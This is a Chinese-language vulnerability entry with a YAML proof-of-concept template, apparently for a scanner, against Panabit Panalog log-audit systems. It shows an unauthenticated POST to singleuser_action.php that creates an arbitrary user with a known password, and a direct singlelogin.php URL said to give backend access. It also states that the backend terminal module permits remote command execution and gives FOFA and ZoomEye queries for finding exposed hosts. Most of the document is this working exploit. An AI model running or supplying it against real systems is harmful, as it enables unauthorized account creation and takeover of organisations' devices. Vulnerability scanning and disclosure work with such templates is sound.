漏洞描述
panabit日志审计存在 singleuser_action.php 任意用户添加漏洞,后台弱存在终端命令模块可rce。
访问 https://x.x.x.x/singlelogin.php?userId=26062 即可进入后台
FOFA: app="Panabit-Panalog"
ZoomEye: app:"Panabit-Panalog"
panabit-singleuser-action-adduser: panabit日志审计 singleuser_action.php 任意用户添加漏洞
PoC代码[已公开]
id: panabit-singleuser-action-adduser
info:
name: panabit日志审计 singleuser_action.php 任意用户添加漏洞
author: zan8in
severity: high
verified: true
description: |-
panabit日志审计存在 singleuser_action.php 任意用户添加漏洞,后台弱存在终端命令模块可rce。
访问 https://x.x.x.x/singlelogin.php?userId=26062 即可进入后台
FOFA: app="Panabit-Panalog"
ZoomEye: app:"Panabit-Panalog"
tags: panabit,adduser
created: 2023/10/30
set:
randInt: randomInt(10000, 99999)
randName: randomLowercase(6)
rules:
r0:
request:
method: POST
path: /singleuser_action.php
headers:
Content-Type: application/json
body: |
{"syncInfo": { "user": { "userId": "{{randInt}}", "userName": "{{randName}}", "employeeId": "119", "departmentId": "119", "departmentName": "119", "coporationId": "119", "corporationName": "119", "userSex": "1", "userDuty": "119", "userBirthday": "119", "userPost": "119", "userPostCode": "119", "userAlias": "119", "userRank": "119", "userPhone": "119", "userHomeAddress": "119", "userMobilePhone": "119", "userMailAddress": "119", "userMSN": "119", "userNt": "119", "userCA": "119", "userPwd": "119", "userClass": "119", "parentId": "119", "bxlx": "119" },"operationType": "ADD_USER" } }
expression: |
response.status == 200 &&
response.body.bcontains(b"{\"yn\":\"yes\",\"str\":\"OK\"}")
expression: r0()